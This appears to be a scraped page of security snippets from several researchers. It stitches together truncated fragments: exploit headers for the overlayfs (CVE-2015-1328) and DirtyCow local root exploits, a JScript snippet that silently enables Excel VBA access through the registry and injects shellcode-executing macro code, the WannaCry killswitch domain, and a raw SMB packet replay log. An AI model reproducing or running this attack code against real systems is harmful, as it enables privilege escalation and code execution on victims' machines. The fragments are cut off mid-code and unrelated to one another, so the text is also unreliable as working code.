scrapped from @x0rz,@etlow,@Dinosn,@hackerfantastic,@highmeh,@cyb3rops and others
- A quick analysis of the latest Shadow Brokers dump https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/
- Timestamps
import sys | |
import requests | |
import re | |
#Original PoC by Gary @ Sec-1 ltd - https://www.exploit-db.com/exploits/38977/ | |
def get_url(url, user_agent): |
/* | |
# Exploit Title: ofs.c - overlayfs local root in ubuntu | |
# Date: 2015-06-15 | |
# Exploit Author: rebel | |
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15) | |
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04 | |
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html) | |
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* | |
CVE-2015-1328 / ofs.c |
/* | |
* (un)comment correct payload first (x86 or x64)! | |
* | |
* $ gcc cowroot.c -o cowroot -pthread | |
* $ ./cowroot | |
* DirtyCow root privilege escalation | |
* Backing up /usr/bin/passwd.. to /tmp/bak | |
* Size of binary: 57048 | |
* Racing, this may take a while.. | |
* /usr/bin/passwd overwritten |
var objExcel = new ActiveXObject("Excel.Application"); | |
objExcel.Visible = false; | |
var WshShell = new ActiveXObject("WScript.Shell"); | |
var Application_Version = objExcel.Version;//Auto-Detect Version | |
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
var objWorkbook = objExcel.Workbooks.Add(); | |
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1); | |
// Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/ | |
var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n'; |
scrapped from @x0rz,@etlow,@Dinosn,@hackerfantastic,@highmeh,@cyb3rops and others
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).update: A minor variant of the viru
('connect', 1, 0.0) | |
('send', 1, b'\x00\x00\x00\x85\xffSMBr\x00\x00\x00\x00\x18S\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00@\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00', 9.812499774852768e-05) | |
('recv', 1, 0.011641267999948468) | |
('send', 1, b'\x00\x00\x00\x88\xffSMBs\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00@\x00\r\xff\x00\x88\x00\x04\x11\n\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xd4\x00\x00\x00K\x00\x00\x00\x00\x00\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x002\x000\x000\x000\x00 \x002\x001\x009\x005\x00\x00\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x002\x000\x000\x000\x00 \x005\x00.\x000\x00\x00\x00', 0.011713792999216821) | |
('recv', 1, 0.00983434200315969) |